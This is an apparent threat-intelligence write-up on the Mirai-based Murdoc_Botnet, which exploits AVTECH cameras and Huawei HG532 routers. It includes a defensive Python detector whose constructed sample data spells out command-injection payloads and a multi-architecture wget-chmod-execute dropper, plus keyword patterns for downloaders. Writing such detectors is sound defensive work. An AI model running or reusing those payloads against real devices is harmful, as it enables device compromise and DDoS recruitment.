
Overview of Murdoc_Botnet

A new Mirai-based botnet, dubbed "Murdoc_Botnet," has been identified and is actively exploiting vulnerabilities in Internet of Things (IoT) devices, particularly AVTECH IP cameras and Huawei HG532 routers. The campaign has been active since July 2024 and has infected over 1,370 devices globally, with a significant concentration in Malaysia, Mexico, Thailand, Indonesia, and Vietnam [1][3].

Exploited Vulnerabilities

Murdoc_Botnet leverages known security flaws to gain initial access to IoT devices. The vulnerabilities exploited include:

  • CVE-2024-7029: A command-injection flaw in the brightness function of AVTECH AVM1203 IP cameras, disclosed in 2024 and used to compromise exposed cameras. The affected models are end-of-life and no vendor fix has been published, so exposed units have to be isolated or replaced rather than patched.
  • CVE-2017-17215: A command-injection flaw in the UPnP DeviceUpgrade service of Huawei HG532 routers (reachable on TCP port 37215), first abused at scale by the Satori Mirai variant in 2017. A fix exists, but it remains unapplied on many deployed units [1][3].

Infection and Malware Deployment

The botnet uses a combination of ELF binaries and shell scripts to infiltrate devices. The infection chain proceeds in three stages:

  • Initial Exploitation: The exploit for one of the vulnerabilities above injects a shell command into the device, which downloads and runs a dropper script.
  • Payload Fetching: The dropper fetches the ELF bot binary that matches the CPU architecture of the infected device (Mirai droppers typically try one binary per architecture, such as ARM, MIPS and x86) and executes it.
  • Command and Control: The bot connects to a command-and-control (C2) server and waits for instructions, principally DDoS attack commands and orders to scan for and infect further devices [1][3].

Command and Control Infrastructure

The Murdoc_Botnet operates with an extensive infrastructure involving over 100 distinct C2 servers. Each server manages and propagates malware to compromised devices, orchestrating payload execution, further infection, and botnet expansion [3].

Impact and Targets

The primary goal of Murdoc_Botnet is to build a large-scale botnet for conducting Distributed Denial-of-Service (DDoS) attacks. The sectors most affected include telecommunications, technology, hosting, cloud computing, banking, gaming, and financial services. Over 55% of the compromised devices are located in India, followed by South Africa, Brazil, Bangladesh, and Kenya [1]. Note that this distribution does not match the Malaysia, Mexico, Thailand, Indonesia and Vietnam concentration reported above; the cited reports cover more than one Mirai-based campaign, so these figures should be checked against the primary source before being attributed to Murdoc_Botnet specifically.

To safeguard against these attacks, it is advised to:

  • Monitor Network Traffic: Regularly monitor for suspicious processes, events, and network traffic spawned by the execution of untrusted binaries and scripts, including outbound downloads from devices that have no business fetching executables.
  • Update Firmware: Ensure that all systems and firmware are updated with the latest releases and patches. Where no fix exists (as for the end-of-life AVTECH AVM1203), keep the device's management and UPnP interfaces off the internet or retire the device.
  • Change Default Credentials: Change the default username and password for IoT devices to prevent easy exploitation by credential-guessing Mirai variants [1][3].
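The following is an added example, not code from the Qualys report or from this page's author: a small detector that scans constructed HTTP request records for the two initial-access patterns described in the infection chain above and for the follow-on per-architecture dropper, the kind of check the "Monitor Network Traffic" advice calls for. The HG532 rule follows the widely documented CVE-2017-17215 SOAP request to /ctrlt/DeviceUpgrade_1 on port 37215 with a command substitution in NewStatusURL or NewDownloadURL. The page does not name the AVTECH endpoint, so the AVTECH CGI path in the sample data is an assumption and the rule keys on shell metacharacters in any query parameter rather than on one exact URL. All request records, the dropper script and the 203.0.113.x addresses are constructed sample data.

```python
import re
from urllib.parse import unquote

# Shell metacharacters and downloader commands that should never appear in a
# camera or router management parameter.
INJECTION = re.compile(
    r"\$\(|`|;|\|\||&&|\b(?:wget|curl|tftp|busybox)\b|/tmp/", re.I
)

# CVE-2017-17215: SOAP DeviceUpgrade_1 request on the HG532 UPnP port (37215)
# carrying a command substitution in NewStatusURL or NewDownloadURL.
HG532_PORT = 37215
HG532_PATH = "/ctrlt/DeviceUpgrade_1"
HG532_TAG = re.compile(
    r"<New(?:StatusURL|DownloadURL)>(.*?)</New(?:StatusURL|DownloadURL)>", re.S
)

# Architecture names a Mirai-style dropper iterates over when it fetches
# one binary per CPU type.
DROPPER_ARCHES = ("arm", "arm5", "arm6", "arm7", "mips", "mipsel",
                  "x86", "x86_64", "sh4", "ppc", "m68k")


def classify_request(rec):
    """Return a finding for one request record, or None if it looks benign.

    rec = {"dst_port": int, "path": str, "body": str}
    """
    path = unquote(rec["path"])
    body = unquote(rec.get("body", ""))
    if rec["dst_port"] == HG532_PORT and path.startswith(HG532_PATH):
        for m in HG532_TAG.finditer(body):
            if INJECTION.search(m.group(1)):
                return "CVE-2017-17215 exploit attempt (DeviceUpgrade_1 injection)"
        return "CVE-2017-17215 probe (DeviceUpgrade_1 without injection)"
    # AVTECH: the exact vulnerable endpoint is not given on the page, so flag
    # any CGI handler that receives shell metacharacters in a parameter.
    if path.startswith("/cgi-bin/") and "?" in path:
        query = path.split("?", 1)[1]
        if INJECTION.search(query):
            return "CGI parameter command injection (AVTECH CVE-2024-7029 pattern)"
    return None


def is_arch_dropper(script):
    """True if a shell script fetches, chmods and runs per-architecture payloads."""
    fetch = re.search(r"\b(?:wget|curl|tftp)\b", script)
    chmod = re.search(r"\bchmod\b", script)
    execute = re.search(r"\./\S+", script)
    arch_hits = sum(1 for a in DROPPER_ARCHES if re.search(rf"\b{a}\b", script))
    return bool(fetch and chmod and execute and arch_hits >= 3)


def scan(records):
    """Return (index, finding) pairs for every record that triggers a rule."""
    out = []
    for i, rec in enumerate(records):
        finding = classify_request(rec)
        if finding:
            out.append((i, finding))
    return out


# Constructed sample records (not real telemetry).
SAMPLE_REQUESTS = [
    {"dst_port": 37215, "path": "/ctrlt/DeviceUpgrade_1",
     "body": "<NewStatusURL>$(/bin/busybox wget http://203.0.113.10/x "
             "-O /tmp/.x;chmod +x /tmp/.x;/tmp/.x)</NewStatusURL>"},
    {"dst_port": 80, "body": "",
     "path": "/cgi-bin/supervisor/Factory.cgi?action=brightness"
             "&brightness=1%3Bwget%20http://203.0.113.10/s.sh"},
    {"dst_port": 80, "body": "",
     "path": "/cgi-bin/supervisor/Factory.cgi?action=brightness&brightness=50"},
    {"dst_port": 37215, "path": "/ctrlt/DeviceUpgrade_1",
     "body": "<NewStatusURL>http://203.0.113.10/fw.bin</NewStatusURL>"},
]

# Constructed dropper in the unrolled style Mirai variants typically use.
SAMPLE_DROPPER = (
    "cd /tmp || cd /var/run; "
    "wget http://203.0.113.10/arm7 -O arm7; chmod 777 arm7; ./arm7; rm -f arm7; "
    "wget http://203.0.113.10/mips -O mips; chmod 777 mips; ./mips; rm -f mips; "
    "wget http://203.0.113.10/x86 -O x86; chmod 777 x86; ./x86; rm -f x86"
)

if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_REQUESTS):
        print(f"request {idx}: {finding}")
    print("dropper:", is_arch_dropper(SAMPLE_DROPPER))
```

The probe case (a DeviceUpgrade_1 request with a clean URL) is reported separately from an exploit attempt because the HG532 UPnP service should not be reachable from the internet at all; any hit on port 37215 from outside is worth an alert even without an injected command.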

Broader Context of Mirai Botnet and IoT Vulnerabilities

Mirai Botnet Variants

Murdoc_Botnet is part of a larger family of Mirai botnet variants that have been active in exploiting IoT vulnerabilities. Another recent variant, "gayfemboy," has been exploiting a recently disclosed flaw in Four-Faith industrial routers since early November 2024 [1].

The use of IoT devices in DDoS attacks is a growing trend. For example, Cloudflare reported a record-breaking 5.6 Tbps UDP DDoS attack in October 2024, launched by a Mirai-variant botnet of over 13,000 IoT devices. Because such attacks are short-lived and extremely intense, Cloudflare points to the need for automated, in-line DDoS protection rather than manual response [5].

Security Risks for AVTECH and Huawei Devices

The exploitation of vulnerabilities in AVTECH IP cameras and Huawei routers by Murdoc_Botnet underscores the ongoing security risks associated with these devices. Users and administrators must keep firmware current, change default credentials, and remove internet exposure from devices that can no longer be patched. The fact that many of these devices remain unpatched and vulnerable to years-old exploits like CVE-2017-17215 exacerbates the issue [1][3].

In summary, Murdoc_Botnet represents a significant threat to IoT security, leveraging known vulnerabilities to build extensive botnets for DDoS attacks. The ongoing activity emphasizes the need for proactive security measures, including regular updates, monitoring, and the use of secure credentials. For more detailed information, refer to the sources from Qualys and Cloudflare [1][3][5].